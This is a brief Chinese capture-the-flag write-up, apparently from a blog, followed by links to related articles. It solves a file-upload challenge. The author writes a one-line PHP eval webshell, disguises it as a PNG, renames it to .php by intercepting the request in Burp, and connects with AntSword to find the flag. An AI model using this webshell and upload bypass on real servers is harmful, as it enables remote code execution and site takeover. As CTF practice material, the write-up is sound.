只能上传png图片,我们写一个一句话木马<?php @eval($_POST[‘attack‘]) ?>
重命名为1.png,bp抓包,然后上传,
ctrl+R放到repeater中,将1.png改为1.php
GO一下,发现上传成功,返回了上传路径/upload/1.php
用蚁剑连接,在/var/www/html路径发现flag.php
相关文章
- 01-08web安全入门 4 (文件上传漏洞与webshell)
- 01-08Web入门-URL扫描工具dirsearch的使用
- 01-08web前端入门到实战:css3贝塞尔曲线(cubic-bezier)
- 01-08ctf_show-web入门-其他-(396-405)
- 01-0834-10000 web入门 HTML5布局 (div标签使用)持续高强度的投入技术研发工作,才能创造大的价值!
- 01-0824-10000 web开发入门-HTML布局 网页布局
- 01-08.Net Core gRPC入门(二)——Web客户端
- 01-08web前端入门到实战:CSS属性width和height
- 01-08Cobalt Strike从入门到精通之Web Drive-By web钓鱼攻击
- 01-08Cobalt Strike从入门到精通之Web Drive-By web钓鱼攻击